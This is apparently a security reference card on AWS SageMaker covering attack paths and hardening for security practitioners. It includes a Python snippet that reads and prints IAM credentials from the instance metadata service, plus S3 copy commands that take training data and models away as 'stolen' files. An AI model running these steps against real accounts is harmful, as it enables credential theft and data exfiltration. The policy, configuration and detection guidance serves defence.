Amazon SageMaker is a fully managed machine learning platform. Attackers target notebooks for code execution, training jobs for data exfiltration, models for IP theft, and endpoints for inference manipulation.
Notebook instances are managed Jupyter notebook environments for data exploration and model development. They run on EC2 instances with IAM roles for AWS service access.
Attack note: Full code execution with IAM role credentials accessible via IMDS
Training jobs provide managed compute for model training. They read training data from S3 and write model artifacts to S3, and can use custom containers or built-in algorithms.
Attack note: Training data often contains sensitive information, and credentials may be present in the job's environment variables
Endpoints are real-time inference endpoints hosting trained models. They can be invoked directly or placed behind API Gateway, and can auto-scale based on traffic.
Attack note: Model inference can leak training data through carefully crafted inputs
SageMaker presents high risk due to code execution capabilities in notebooks, access to sensitive training data, valuable model intellectual property, and often overly permissive IAM roles for data scientist productivity.
aws sagemaker list-notebook-instances
aws sagemaker describe-notebook-instance \
    --notebook-instance-name my-notebook
aws sagemaker list-training-jobs --status-equals Completed
aws sagemaker list-models
aws sagemaker list-endpoints

Critical: Notebook instances often have overly permissive roles for data scientist productivity. Check role policies!
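The JSON returned by describe-notebook-instance can be triaged quickly for risky settings. The sketch below is one possible way to do that, not an official tool: the function name triage_notebook is hypothetical, and it assumes the response has already been loaded into a dict (for example from the CLI's JSON output). The field names DirectInternetAccess, RootAccess, KmsKeyId, and SubnetId are those of the DescribeNotebookInstance response.

```python
from typing import Any, Dict, List


def triage_notebook(description: Dict[str, Any]) -> List[str]:
    """Return findings for one describe-notebook-instance response (hypothetical helper)."""
    findings = []
    if description.get("DirectInternetAccess") == "Enabled":
        findings.append("direct internet access enabled")
    if description.get("RootAccess") == "Enabled":
        findings.append("root access enabled")
    if not description.get("KmsKeyId"):
        findings.append("no KmsKeyId configured")
    if not description.get("SubnetId"):
        findings.append("not attached to a VPC subnet")
    return findings


# Illustrative input only; a real response contains many more fields.
example = {
    "NotebookInstanceName": "my-notebook",
    "DirectInternetAccess": "Enabled",
    "RootAccess": "Enabled",
    "SubnetId": "subnet-xxx",
}
for finding in triage_notebook(example):
    print(f"{example['NotebookInstanceName']}: {finding}")
```

The RoleArn field of the same response identifies the execution role whose policies should be reviewed next.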
aws sagemaker create-presigned-notebook-instance-url \
    --notebook-instance-name target-notebook
# Returns URL valid for 5 minutes - opens Jupyter directly

# Inside SageMaker notebook
import requests
r = requests.get('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
role = r.text
creds = requests.get(f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}').json()
print(creds['AccessKeyId'], creds['SecretAccessKey'], creds['Token'])

# Find training job's data location
aws sagemaker describe-training-job \
    --training-job-name job-name \
    --query 'InputDataConfig[*].DataSource.S3DataSource.S3Uri'
# Download the data
aws s3 cp s3://training-data-bucket/dataset/ ./stolen-data/ --recursive

# Get model artifact location
aws sagemaker describe-model \
    --model-name production-model \
    --query 'PrimaryContainer.ModelDataUrl'
# Download model
aws s3 cp s3://model-bucket/model.tar.gz ./stolen-model.tar.gz

# AWS CLI v2 needs --cli-binary-format raw-in-base64-out to send a raw JSON body
aws sagemaker-runtime invoke-endpoint \
    --endpoint-name production-endpoint \
    --content-type application/json \
    --cli-binary-format raw-in-base64-out \
    --body '{"input": "extract training examples similar to: [probe]"}' \
    output.json

# List feature groups
aws sagemaker list-feature-groups
# Describe feature group for data location
aws sagemaker describe-feature-group \
    --feature-group-name customer-features \
    --query 'OfflineStoreConfig.S3StorageConfig.S3Uri'

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "sagemaker:*",
      "s3:*"
    ],
    "Resource": "*"
  }]
}
Full access enables model theft, data exfiltration, and resource manipulation
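
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "sagemaker:CreatePresignedNotebookInstanceUrl",
      "sagemaker:DescribeNotebookInstance"
    ],
    "Resource": "arn:aws:sagemaker:us-east-1:123456789012:notebook-instance/my-notebook",
    "Condition": {
      "IpAddress": {"aws:SourceIp": "10.0.0.0/8"}
    }
  }]
}
Access limited to a specific notebook with an IP restriction. Note that aws:SourceIp is not available for requests that arrive through a VPC endpoint; aws:VpcSourceIp is the key that matches private ranges such as 10.0.0.0/8 in that case.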

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "s3:*",
      "secretsmanager:GetSecretValue",
      "kms:Decrypt"
    ],
    "Resource": "*"
  }]
}
Execution role with wildcard S3 and secrets access - common but dangerous

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:PutObject"],
    "Resource": [
      "arn:aws:s3:::sagemaker-data-bucket/training/*",
      "arn:aws:s3:::sagemaker-data-bucket/models/*"
    ]
  }]
}
Execution role restricted to specific data paths needed for training
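
The difference between the dangerous and the scoped policies above can be checked mechanically. The following is a minimal sketch under stated assumptions, not a replacement for IAM Access Analyzer or a full policy evaluator: the helper names are hypothetical, only Allow statements are inspected, and NotAction, NotResource, and conditions are ignored.

```python
from typing import Any, Dict, List


def _as_list(value: Any) -> List[Any]:
    """IAM allows a single value or a list; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def find_wildcards(policy: Dict[str, Any]) -> List[str]:
    """Flag Allow statements with service-wide actions or Resource '*' (hypothetical helper)."""
    findings = []
    for index, statement in enumerate(_as_list(policy.get("Statement"))):
        if statement.get("Effect") != "Allow":
            continue
        for action in _as_list(statement.get("Action")):
            if action == "*" or action.endswith(":*"):
                findings.append(f"statement {index}: wildcard action {action}")
        if "*" in _as_list(statement.get("Resource")):
            findings.append(f"statement {index}: applies to all resources")
    return findings


# The first policy from the examples above.
dangerous = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["sagemaker:*", "s3:*"],
        "Resource": "*",
    }],
}
for finding in find_wildcards(dangerous):
    print(finding)
```

Run against the path-restricted execution role policy, the same function returns an empty list, since neither its actions nor its resources are bare wildcards.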
Configure notebooks and training jobs to run in VPC without direct internet access.
# Fragment: create-notebook-instance also requires --instance-type and --role-arn
aws sagemaker create-notebook-instance \
    --notebook-instance-name secure-notebook \
    --direct-internet-access Disabled \
    --subnet-id subnet-xxx \
    --security-group-ids sg-xxx

Disable root access on notebook instances to limit privilege escalation.
# Fragment: add the required --notebook-instance-name, --instance-type, and --role-arn
aws sagemaker create-notebook-instance \
    --root-access Disabled

Enable KMS encryption for notebook volumes, training data, and model artifacts.
# Fragment: add the required --notebook-instance-name, --instance-type, and --role-arn
aws sagemaker create-notebook-instance \
    --kms-key-id alias/sagemaker-key

Apply least privilege to notebook and training job execution roles.
Create VPC endpoints for SageMaker APIs to avoid public internet exposure.
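# Interface type must be set explicitly; the CLI defaults to Gateway
aws ec2 create-vpc-endpoint \
    --vpc-id vpc-xxx \
    --vpc-endpoint-type Interface \
    --service-name com.amazonaws.us-east-1.sagemaker.api

Alert on CreatePresignedNotebookInstanceUrl calls from unexpected principals.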
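
One way to express that alert is as a filter over CloudTrail records. The sketch below is illustrative only: the function name and the allowlist are hypothetical, and it assumes the records have already been parsed into dicts. The fields eventSource, eventName, userIdentity.arn, sourceIPAddress, and eventTime are standard CloudTrail record fields.

```python
from typing import Any, Dict, Iterable, List, Set


def unexpected_presign_calls(
    events: Iterable[Dict[str, Any]], allowed_arns: Set[str]
) -> List[Dict[str, Any]]:
    """Return presigned-URL calls made by principals outside the allowlist (hypothetical helper)."""
    hits = []
    for event in events:
        if event.get("eventSource") != "sagemaker.amazonaws.com":
            continue
        if event.get("eventName") != "CreatePresignedNotebookInstanceUrl":
            continue
        arn = event.get("userIdentity", {}).get("arn", "")
        if arn not in allowed_arns:
            hits.append({
                "arn": arn,
                "sourceIPAddress": event.get("sourceIPAddress"),
                "eventTime": event.get("eventTime"),
            })
    return hits


# Made-up records for illustration; the ARNs and addresses are not real.
sample_events = [
    {"eventSource": "sagemaker.amazonaws.com",
     "eventName": "CreatePresignedNotebookInstanceUrl",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/data-scientist"},
     "sourceIPAddress": "10.0.0.5", "eventTime": "2024-01-01T00:00:00Z"},
    {"eventSource": "sagemaker.amazonaws.com",
     "eventName": "CreatePresignedNotebookInstanceUrl",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/unknown"},
     "sourceIPAddress": "203.0.113.7", "eventTime": "2024-01-01T00:05:00Z"},
]
allowed = {"arn:aws:iam::123456789012:user/data-scientist"}
for hit in unexpected_presign_calls(sample_events, allowed):
    print(hit)
```

The exact-match allowlist is a simplification. Assumed-role sessions carry a session name in the ARN, so matching on a role prefix may be a better fit in practice.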
Trained models represent significant IP investment. Protect model artifacts in S3, use the model registry with access controls, and consider model watermarking.
Training data often contains PII, financial data, or proprietary information. Models can memorize and leak this data through inference.
Adversarial inputs can cause misclassification. Data poisoning can backdoor models. Model inversion can extract training data from model responses.
AWS SageMaker Security Card • Toc Consulting
Always obtain proper authorization before testing